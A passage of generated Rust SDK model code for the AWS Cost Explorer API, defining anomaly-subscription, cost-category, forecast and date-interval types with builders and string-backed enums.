    pub fn values() -> &'static [&'static str] {
        &["CostCategoryExpression.v1"]
    }
}
impl AsRef<str> for CostCategoryRuleVersion {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>The recipient of <code>AnomalySubscription</code> notifications. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Subscriber {
    /// <p>The email address or SNS Amazon Resource Name (ARN). This depends on the
    /// <code>Type</code>. </p>
    pub address: std::option::Option<std::string::String>,
    /// <p>The notification delivery channel. </p>
    pub r#type: std::option::Option<crate::model::SubscriberType>,
    /// <p>Indicates if the subscriber accepts the notifications. </p>
    pub status: std::option::Option<crate::model::SubscriberStatus>,
}
impl std::fmt::Debug for Subscriber {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        // Chained debug-struct builder; renders the same output as the
        // statement-per-field form.
        f.debug_struct("Subscriber")
            .field("address", &self.address)
            .field("r#type", &self.r#type)
            .field("status", &self.status)
            .finish()
    }
}
/// See [`Subscriber`](crate::model::Subscriber)
pub mod subscriber {
    /// A builder for [`Subscriber`](crate::model::Subscriber)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) address: std::option::Option<std::string::String>,
        pub(crate) r#type: std::option::Option<crate::model::SubscriberType>,
        pub(crate) status: std::option::Option<crate::model::SubscriberStatus>,
    }
    impl Builder {
        /// <p>The email address or SNS Amazon Resource Name (ARN). This depends on the
        /// <code>Type</code>. </p>
        pub fn address(self, input: impl Into<std::string::String>) -> Self {
            Self {
                address: Some(input.into()),
                ..self
            }
        }
        /// Replaces the address with the given optional value.
        pub fn set_address(self, input: std::option::Option<std::string::String>) -> Self {
            Self {
                address: input,
                ..self
            }
        }
        /// <p>The notification delivery channel. </p>
        pub fn r#type(self, input: crate::model::SubscriberType) -> Self {
            Self {
                r#type: Some(input),
                ..self
            }
        }
        /// Replaces the delivery channel with the given optional value.
        pub fn set_type(
            self,
            input: std::option::Option<crate::model::SubscriberType>,
        ) -> Self {
            Self {
                r#type: input,
                ..self
            }
        }
        /// <p>Indicates if the subscriber accepts the notifications. </p>
        pub fn status(self, input: crate::model::SubscriberStatus) -> Self {
            Self {
                status: Some(input),
                ..self
            }
        }
        /// Replaces the status with the given optional value.
        pub fn set_status(
            self,
            input: std::option::Option<crate::model::SubscriberStatus>,
        ) -> Self {
            Self {
                status: input,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`Subscriber`](crate::model::Subscriber)
        pub fn build(self) -> crate::model::Subscriber {
            let Builder {
                address,
                r#type,
                status,
            } = self;
            crate::model::Subscriber {
                address,
                r#type,
                status,
            }
        }
    }
}
impl Subscriber {
    /// Creates a new builder-style object to manufacture [`Subscriber`](crate::model::Subscriber)
    pub fn builder() -> crate::model::subscriber::Builder {
        Default::default()
    }
}
/// Whether a subscriber has accepted anomaly notifications.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum SubscriberStatus {
    Confirmed,
    Declined,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for SubscriberStatus {
    fn from(s: &str) -> Self {
        // Unrecognized strings are preserved verbatim in `Unknown` so newer
        // service values still round-trip.
        match s {
            "CONFIRMED" => Self::Confirmed,
            "DECLINED" => Self::Declined,
            other => Self::Unknown(other.to_owned()),
        }
    }
}
impl std::str::FromStr for SubscriberStatus {
    type Err = std::convert::Infallible;
    /// Parsing never fails: any input maps to a variant (possibly `Unknown`).
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl SubscriberStatus {
    /// Returns the string form of this value.
    pub fn as_str(&self) -> &str {
        match self {
            Self::Confirmed => "CONFIRMED",
            Self::Declined => "DECLINED",
            Self::Unknown(value) => value.as_ref(),
        }
    }
    /// Lists every value that was known when this code was generated.
    pub fn values() -> &'static [&'static str] {
        &["CONFIRMED", "DECLINED"]
    }
}
impl AsRef<str> for SubscriberStatus {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// The delivery channel for anomaly notifications.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum SubscriberType {
    Email,
    Sns,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for SubscriberType {
    fn from(s: &str) -> Self {
        // Unrecognized strings are preserved verbatim in `Unknown` so newer
        // service values still round-trip.
        match s {
            "EMAIL" => Self::Email,
            "SNS" => Self::Sns,
            other => Self::Unknown(other.to_owned()),
        }
    }
}
impl std::str::FromStr for SubscriberType {
    type Err = std::convert::Infallible;
    /// Parsing never fails: any input maps to a variant (possibly `Unknown`).
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl SubscriberType {
    /// Returns the string form of this value.
    pub fn as_str(&self) -> &str {
        match self {
            Self::Email => "EMAIL",
            Self::Sns => "SNS",
            Self::Unknown(value) => value.as_ref(),
        }
    }
    /// Lists every value that was known when this code was generated.
    pub fn values() -> &'static [&'static str] {
        &["EMAIL", "SNS"]
    }
}
impl AsRef<str> for SubscriberType {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// String-backed enumeration of anomaly-subscription notification
/// frequencies (`DAILY`, `IMMEDIATE`, `WEEKLY`); values added to the
/// service after code generation round-trip through `Unknown`.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum AnomalySubscriptionFrequency {
    Daily,
    Immediate,
    Weekly,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for AnomalySubscriptionFrequency {
    /// Maps a wire string onto the matching variant, preserving
    /// unrecognized input in `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "DAILY" => Self::Daily,
            "IMMEDIATE" => Self::Immediate,
            "WEEKLY" => Self::Weekly,
            _ => Self::Unknown(s.to_owned()),
        }
    }
}
impl std::str::FromStr for AnomalySubscriptionFrequency {
    type Err = std::convert::Infallible;
    /// Parsing never fails; unrecognized input becomes `Unknown`.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl AnomalySubscriptionFrequency {
    /// Returns the wire representation of this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::Daily => "DAILY",
            Self::Immediate => "IMMEDIATE",
            Self::Weekly => "WEEKLY",
            Self::Unknown(value) => value.as_str(),
        }
    }
    /// Returns every wire value known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &["DAILY", "IMMEDIATE", "WEEKLY"]
    }
}
impl AsRef<str> for AnomalySubscriptionFrequency {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// String-backed enumeration of anomaly feedback values
/// (`NO`, `PLANNED_ACTIVITY`, `YES`); values added to the service after
/// code generation round-trip through `Unknown`.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum AnomalyFeedbackType {
    No,
    PlannedActivity,
    Yes,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for AnomalyFeedbackType {
    /// Maps a wire string onto the matching variant, preserving
    /// unrecognized input in `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "NO" => Self::No,
            "PLANNED_ACTIVITY" => Self::PlannedActivity,
            "YES" => Self::Yes,
            _ => Self::Unknown(s.to_owned()),
        }
    }
}
impl std::str::FromStr for AnomalyFeedbackType {
    type Err = std::convert::Infallible;
    /// Parsing never fails; unrecognized input becomes `Unknown`.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl AnomalyFeedbackType {
    /// Returns the wire representation of this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::No => "NO",
            Self::PlannedActivity => "PLANNED_ACTIVITY",
            Self::Yes => "YES",
            Self::Unknown(value) => value.as_str(),
        }
    }
    /// Returns every wire value known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &["NO", "PLANNED_ACTIVITY", "YES"]
    }
}
impl AsRef<str> for AnomalyFeedbackType {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>A reference to a Cost Category containing only enough information to identify the Cost
/// Category.</p>
/// <p>You can use this information to retrieve the full Cost Category information using
/// <code>DescribeCostCategory</code>.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategoryReference {
    /// <p>The unique identifier for your Cost Category. </p>
    pub cost_category_arn: std::option::Option<std::string::String>,
    /// <p>The unique name of the Cost Category.</p>
    pub name: std::option::Option<std::string::String>,
    /// <p>The Cost Category's effective start date.</p>
    pub effective_start: std::option::Option<std::string::String>,
    /// <p>The Cost Category's effective end date.</p>
    pub effective_end: std::option::Option<std::string::String>,
    /// <p>The number of rules that are associated with a specific Cost Category. </p>
    pub number_of_rules: i32,
    /// <p>The list of processing statuses for Cost Management products for a specific cost
    /// category. </p>
    pub processing_status:
        std::option::Option<std::vec::Vec<crate::model::CostCategoryProcessingStatus>>,
    /// <p>A list of unique cost category values in a specific cost category. </p>
    pub values: std::option::Option<std::vec::Vec<std::string::String>>,
    /// <p>The
    /// default value for the cost category.</p>
    pub default_value: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CostCategoryReference {
    /// Renders every field through `Formatter::debug_struct`.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("CostCategoryReference")
            .field("cost_category_arn", &self.cost_category_arn)
            .field("name", &self.name)
            .field("effective_start", &self.effective_start)
            .field("effective_end", &self.effective_end)
            .field("number_of_rules", &self.number_of_rules)
            .field("processing_status", &self.processing_status)
            .field("values", &self.values)
            .field("default_value", &self.default_value)
            .finish()
    }
}
/// See [`CostCategoryReference`](crate::model::CostCategoryReference)
pub mod cost_category_reference {
    /// A builder for [`CostCategoryReference`](crate::model::CostCategoryReference)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) cost_category_arn: std::option::Option<std::string::String>,
        pub(crate) name: std::option::Option<std::string::String>,
        pub(crate) effective_start: std::option::Option<std::string::String>,
        pub(crate) effective_end: std::option::Option<std::string::String>,
        pub(crate) number_of_rules: std::option::Option<i32>,
        pub(crate) processing_status:
            std::option::Option<std::vec::Vec<crate::model::CostCategoryProcessingStatus>>,
        pub(crate) values: std::option::Option<std::vec::Vec<std::string::String>>,
        pub(crate) default_value: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The unique identifier for your Cost Category. </p>
        pub fn cost_category_arn(self, input: impl Into<std::string::String>) -> Self {
            Self {
                cost_category_arn: Some(input.into()),
                ..self
            }
        }
        /// Replaces the ARN with an explicit optional value.
        pub fn set_cost_category_arn(
            self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                cost_category_arn: input,
                ..self
            }
        }
        /// <p>The unique name of the Cost Category.</p>
        pub fn name(self, input: impl Into<std::string::String>) -> Self {
            Self {
                name: Some(input.into()),
                ..self
            }
        }
        /// Replaces the name with an explicit optional value.
        pub fn set_name(self, input: std::option::Option<std::string::String>) -> Self {
            Self { name: input, ..self }
        }
        /// <p>The Cost Category's effective start date.</p>
        pub fn effective_start(self, input: impl Into<std::string::String>) -> Self {
            Self {
                effective_start: Some(input.into()),
                ..self
            }
        }
        /// Replaces the effective start date with an explicit optional value.
        pub fn set_effective_start(
            self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                effective_start: input,
                ..self
            }
        }
        /// <p>The Cost Category's effective end date.</p>
        pub fn effective_end(self, input: impl Into<std::string::String>) -> Self {
            Self {
                effective_end: Some(input.into()),
                ..self
            }
        }
        /// Replaces the effective end date with an explicit optional value.
        pub fn set_effective_end(
            self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                effective_end: input,
                ..self
            }
        }
        /// <p>The number of rules that are associated with a specific Cost Category. </p>
        pub fn number_of_rules(self, input: i32) -> Self {
            Self {
                number_of_rules: Some(input),
                ..self
            }
        }
        /// Replaces the rule count with an explicit optional value.
        pub fn set_number_of_rules(self, input: std::option::Option<i32>) -> Self {
            Self {
                number_of_rules: input,
                ..self
            }
        }
        /// Appends one processing-status entry; use `set_processing_status`
        /// to replace the whole list.
        pub fn processing_status(
            mut self,
            input: impl Into<crate::model::CostCategoryProcessingStatus>,
        ) -> Self {
            self.processing_status
                .get_or_insert_with(Vec::new)
                .push(input.into());
            self
        }
        /// Replaces the processing-status list with an explicit optional value.
        pub fn set_processing_status(
            self,
            input: std::option::Option<std::vec::Vec<crate::model::CostCategoryProcessingStatus>>,
        ) -> Self {
            Self {
                processing_status: input,
                ..self
            }
        }
        /// Appends one cost-category value; use `set_values` to replace the list.
        pub fn values(mut self, input: impl Into<std::string::String>) -> Self {
            self.values.get_or_insert_with(Vec::new).push(input.into());
            self
        }
        /// Replaces the value list with an explicit optional value.
        pub fn set_values(
            self,
            input: std::option::Option<std::vec::Vec<std::string::String>>,
        ) -> Self {
            Self {
                values: input,
                ..self
            }
        }
        /// <p>The
        /// default value for the cost category.</p>
        pub fn default_value(self, input: impl Into<std::string::String>) -> Self {
            Self {
                default_value: Some(input.into()),
                ..self
            }
        }
        /// Replaces the default value with an explicit optional value.
        pub fn set_default_value(
            self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                default_value: input,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`CostCategoryReference`](crate::model::CostCategoryReference)
        pub fn build(self) -> crate::model::CostCategoryReference {
            crate::model::CostCategoryReference {
                cost_category_arn: self.cost_category_arn,
                name: self.name,
                effective_start: self.effective_start,
                effective_end: self.effective_end,
                // An unset rule count falls back to i32's default (0).
                number_of_rules: self.number_of_rules.unwrap_or_default(),
                processing_status: self.processing_status,
                values: self.values,
                default_value: self.default_value,
            }
        }
    }
}
impl CostCategoryReference {
    /// Creates a new builder-style object to manufacture [`CostCategoryReference`](crate::model::CostCategoryReference)
    pub fn builder() -> crate::model::cost_category_reference::Builder {
        Default::default()
    }
}
/// <p>The list of processing statuses for Cost Management products for a specific cost
/// category. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategoryProcessingStatus {
    /// <p>The Cost Management product name of the applied status. </p>
    pub component: std::option::Option<crate::model::CostCategoryStatusComponent>,
    /// <p>The process status for a specific cost category. </p>
    pub status: std::option::Option<crate::model::CostCategoryStatus>,
}
impl std::fmt::Debug for CostCategoryProcessingStatus {
    /// Renders both fields through `Formatter::debug_struct`.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("CostCategoryProcessingStatus")
            .field("component", &self.component)
            .field("status", &self.status)
            .finish()
    }
}
/// See [`CostCategoryProcessingStatus`](crate::model::CostCategoryProcessingStatus)
pub mod cost_category_processing_status {
    /// A builder for [`CostCategoryProcessingStatus`](crate::model::CostCategoryProcessingStatus)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) component: std::option::Option<crate::model::CostCategoryStatusComponent>,
        pub(crate) status: std::option::Option<crate::model::CostCategoryStatus>,
    }
    impl Builder {
        /// <p>The Cost Management product name of the applied status. </p>
        pub fn component(self, input: crate::model::CostCategoryStatusComponent) -> Self {
            Self {
                component: Some(input),
                ..self
            }
        }
        /// Replaces the component with an explicit optional value.
        pub fn set_component(
            self,
            input: std::option::Option<crate::model::CostCategoryStatusComponent>,
        ) -> Self {
            Self {
                component: input,
                ..self
            }
        }
        /// <p>The process status for a specific cost category. </p>
        pub fn status(self, input: crate::model::CostCategoryStatus) -> Self {
            Self {
                status: Some(input),
                ..self
            }
        }
        /// Replaces the status with an explicit optional value.
        pub fn set_status(
            self,
            input: std::option::Option<crate::model::CostCategoryStatus>,
        ) -> Self {
            Self {
                status: input,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`CostCategoryProcessingStatus`](crate::model::CostCategoryProcessingStatus)
        pub fn build(self) -> crate::model::CostCategoryProcessingStatus {
            crate::model::CostCategoryProcessingStatus {
                component: self.component,
                status: self.status,
            }
        }
    }
}
impl CostCategoryProcessingStatus {
    /// Creates a new builder-style object to manufacture [`CostCategoryProcessingStatus`](crate::model::CostCategoryProcessingStatus)
    pub fn builder() -> crate::model::cost_category_processing_status::Builder {
        Default::default()
    }
}
/// String-backed enumeration of cost category processing states
/// (`APPLIED`, `PROCESSING`); values added to the service after code
/// generation round-trip through `Unknown`.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum CostCategoryStatus {
    Applied,
    Processing,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for CostCategoryStatus {
    /// Maps a wire string onto the matching variant, preserving
    /// unrecognized input in `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "APPLIED" => Self::Applied,
            "PROCESSING" => Self::Processing,
            _ => Self::Unknown(s.to_owned()),
        }
    }
}
impl std::str::FromStr for CostCategoryStatus {
    type Err = std::convert::Infallible;
    /// Parsing never fails; unrecognized input becomes `Unknown`.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl CostCategoryStatus {
    /// Returns the wire representation of this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::Applied => "APPLIED",
            Self::Processing => "PROCESSING",
            Self::Unknown(value) => value.as_str(),
        }
    }
    /// Returns every wire value known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &["APPLIED", "PROCESSING"]
    }
}
impl AsRef<str> for CostCategoryStatus {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// String-backed enumeration of the Cost Management product a processing
/// status applies to (currently only `COST_EXPLORER`); values added to
/// the service after code generation round-trip through `Unknown`.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum CostCategoryStatusComponent {
    CostExplorer,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for CostCategoryStatusComponent {
    /// Maps a wire string onto the matching variant, preserving
    /// unrecognized input in `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "COST_EXPLORER" => Self::CostExplorer,
            _ => Self::Unknown(s.to_owned()),
        }
    }
}
impl std::str::FromStr for CostCategoryStatusComponent {
    type Err = std::convert::Infallible;
    /// Parsing never fails; unrecognized input becomes `Unknown`.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl CostCategoryStatusComponent {
    /// Returns the wire representation of this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::CostExplorer => "COST_EXPLORER",
            Self::Unknown(value) => value.as_str(),
        }
    }
    /// Returns every wire value known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &["COST_EXPLORER"]
    }
}
impl AsRef<str> for CostCategoryStatusComponent {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>The forecast that's created for your query.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ForecastResult {
    /// <p>The period of time that the forecast covers.</p>
    pub time_period: std::option::Option<crate::model::DateInterval>,
    /// <p>The mean value of the forecast.</p>
    pub mean_value: std::option::Option<std::string::String>,
    /// <p>The lower limit for the prediction interval. </p>
    pub prediction_interval_lower_bound: std::option::Option<std::string::String>,
    /// <p>The upper limit for the prediction interval. </p>
    pub prediction_interval_upper_bound: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ForecastResult {
    /// Renders every field through `Formatter::debug_struct`.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("ForecastResult")
            .field("time_period", &self.time_period)
            .field("mean_value", &self.mean_value)
            .field(
                "prediction_interval_lower_bound",
                &self.prediction_interval_lower_bound,
            )
            .field(
                "prediction_interval_upper_bound",
                &self.prediction_interval_upper_bound,
            )
            .finish()
    }
}
/// See [`ForecastResult`](crate::model::ForecastResult)
pub mod forecast_result {
    /// A builder for [`ForecastResult`](crate::model::ForecastResult)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) time_period: std::option::Option<crate::model::DateInterval>,
        pub(crate) mean_value: std::option::Option<std::string::String>,
        pub(crate) prediction_interval_lower_bound: std::option::Option<std::string::String>,
        pub(crate) prediction_interval_upper_bound: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The period of time that the forecast covers.</p>
        pub fn time_period(self, input: crate::model::DateInterval) -> Self {
            Self {
                time_period: Some(input),
                ..self
            }
        }
        /// Replaces the time period with an explicit optional value.
        pub fn set_time_period(
            self,
            input: std::option::Option<crate::model::DateInterval>,
        ) -> Self {
            Self {
                time_period: input,
                ..self
            }
        }
        /// <p>The mean value of the forecast.</p>
        pub fn mean_value(self, input: impl Into<std::string::String>) -> Self {
            Self {
                mean_value: Some(input.into()),
                ..self
            }
        }
        /// Replaces the mean value with an explicit optional value.
        pub fn set_mean_value(self, input: std::option::Option<std::string::String>) -> Self {
            Self {
                mean_value: input,
                ..self
            }
        }
        /// <p>The lower limit for the prediction interval. </p>
        pub fn prediction_interval_lower_bound(
            self,
            input: impl Into<std::string::String>,
        ) -> Self {
            Self {
                prediction_interval_lower_bound: Some(input.into()),
                ..self
            }
        }
        /// Replaces the lower bound with an explicit optional value.
        pub fn set_prediction_interval_lower_bound(
            self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                prediction_interval_lower_bound: input,
                ..self
            }
        }
        /// <p>The upper limit for the prediction interval. </p>
        pub fn prediction_interval_upper_bound(
            self,
            input: impl Into<std::string::String>,
        ) -> Self {
            Self {
                prediction_interval_upper_bound: Some(input.into()),
                ..self
            }
        }
        /// Replaces the upper bound with an explicit optional value.
        pub fn set_prediction_interval_upper_bound(
            self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            Self {
                prediction_interval_upper_bound: input,
                ..self
            }
        }
        /// Consumes the builder and constructs a [`ForecastResult`](crate::model::ForecastResult)
        pub fn build(self) -> crate::model::ForecastResult {
            crate::model::ForecastResult {
                time_period: self.time_period,
                mean_value: self.mean_value,
                prediction_interval_lower_bound: self.prediction_interval_lower_bound,
                prediction_interval_upper_bound: self.prediction_interval_upper_bound,
            }
        }
    }
}
impl ForecastResult {
    /// Creates a new builder-style object to manufacture [`ForecastResult`](crate::model::ForecastResult)
    pub fn builder() -> crate::model::forecast_result::Builder {
        Default::default()
    }
}
/// <p>The time period of the request. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DateInterval {
    /// <p>The beginning of the time period. The start date is inclusive. For example, if
    /// <code>start</code> is <code>2017-01-01</code>, Amazon Web Services retrieves cost and
    /// usage data starting at <code>2017-01-01</code> up to the end date. The start date must
    /// be equal to or no later than the current date to avoid a validation error.</p>
    pub start: std::option::Option<std::string::String>,
    /// <p>The end of the time period. The end date is exclusive. For example, if
    /// <code>end</code> is <code>2017-05-01</code>, Amazon Web Services retrieves cost and
    /// usage data from the start date up to, but not including, <code>2017-05-01</code>.</p>
    pub end: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for DateInterval {
    /// Renders both fields through `Formatter::debug_struct`.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("DateInterval")
            .field("start", &self.start)
            .field("end", &self.end)
            .finish()
    }
}
/// See [`DateInterval`](crate::model::DateInterval)
pub mod date_interval {
    /// A builder for [`DateInterval`](crate::model::DateInterval)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) start: std::option::Option<std::string::String>,
        pub(crate) end: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The beginning of the time period. The start date is inclusive. For example, if
        /// <code>start</code> is <code>2017-01-01</code>, Amazon Web Services retrieves cost and
        /// usage data starting at <code>2017-01-01</code> up to the end date. The start date must
        /// be equal to or no later than the current date to avoid a validation error.</p>
        pub fn start(self, input: impl Into<std::string::String>) -> Self {
            Self {
                start: Some(input.into()),
                ..self
            }
        }
        /// Replaces the start date with an explicit optional value.
        pub fn set_start(self, input: std::option::Option<std::string::String>) -> Self {
            Self { start: input, ..self }
        }
        /// <p>The end of the time period. The end date is exclusive. For example, if
        /// <code>end</code> is <code>2017-05-01</code>, Amazon Web Services retrieves cost and
        /// usage data from the start date up to, but not including, <code>2017-05-01</code>.</p>
        pub fn end(self, input: impl Into<std::string::String>) -> Self {
            Self {
                end: Some(input.into()),
                ..self
            }
        }
        /// Replaces the end date with an explicit optional value.
        pub fn set_end(self, input: std::option::Option<std::string::String>) -> Self {
            Self { end: input, ..self }
        }
        /// Consumes the builder and constructs a [`DateInterval`](crate::model::DateInterval)
        pub fn build(self) -> crate::model::DateInterval {
            crate::model::DateInterval {
                start: self.start,
                end: self.end,
            }
        }
    }
}
impl DateInterval {
    /// Creates a new builder-style object to manufacture [`DateInterval`](crate::model::DateInterval)
    pub fn builder() -> crate::model::date_interval::Builder {
        Default::default()
    }
}
/// <p>The aggregated value for a metric.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct MetricValue {
    /// <p>The actual number that represents the metric.</p>
    pub amount: std::option::Option<std::string::String>,
    /// <p>The unit that the metric is given in.</p>
    pub unit: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for MetricValue {
    /// Renders both fields through `Formatter::debug_struct`.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("MetricValue")
            .field("amount", &self.amount)
            .field("unit", &self.unit)
            .finish()
    }
}
/// See [`MetricValue`](crate::model::MetricValue)
pub mod metric_value {
    /// A builder for [`MetricValue`](crate::model::MetricValue)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) amount: std::option::Option<std::string::String>,
        pub(crate) unit: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The actual number that represents the metric.</p>
        pub fn amount(self, input: impl Into<std::string::String>) -> Self {
            Self {
                amount: Some(input.into()),
                ..self
            }
        }
        /// Replaces the amount with an explicit optional value.
        pub fn set_amount(self, input: std::option::Option<std::string::String>) -> Self {
            Self { amount: input, ..self }
        }
        /// <p>The unit that the metric is given in.</p>
        pub fn unit(self, input: impl Into<std::string::String>) -> Self {
            Self {
                unit: Some(input.into()),
                ..self
            }
        }
        /// Replaces the unit with an explicit optional value.
        pub fn set_unit(self, input: std::option::Option<std::string::String>) -> Self {
            Self { unit: input, ..self }
        }
        /// Consumes the builder and constructs a [`MetricValue`](crate::model::MetricValue)
        pub fn build(self) -> crate::model::MetricValue {
            crate::model::MetricValue {
                amount: self.amount,
                unit: self.unit,
            }
        }
    }
}
impl MetricValue {
    /// Creates a new builder-style object to manufacture [`MetricValue`](crate::model::MetricValue)
    pub fn builder() -> crate::model::metric_value::Builder {
        Default::default()
    }
}
/// String-backed enumeration of reporting granularities
/// (`DAILY`, `HOURLY`, `MONTHLY`); values added to the service after
/// code generation round-trip through `Unknown`.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum Granularity {
    Daily,
    Hourly,
    Monthly,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for Granularity {
    /// Maps a wire string onto the matching variant, preserving
    /// unrecognized input in `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "DAILY" => Self::Daily,
            "HOURLY" => Self::Hourly,
            "MONTHLY" => Self::Monthly,
            _ => Self::Unknown(s.to_owned()),
        }
    }
}
impl std::str::FromStr for Granularity {
    type Err = std::convert::Infallible;
    /// Parsing never fails; unrecognized input becomes `Unknown`.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl Granularity {
    /// Returns the wire representation of this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::Daily => "DAILY",
            Self::Hourly => "HOURLY",
            Self::Monthly => "MONTHLY",
            Self::Unknown(value) => value.as_str(),
        }
    }
    /// Returns every wire value known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &["DAILY", "HOURLY", "MONTHLY"]
    }
}
impl AsRef<str> for Granularity {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// String-backed enumeration of cost/usage metric names; values added
/// to the service after code generation round-trip through `Unknown`.
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
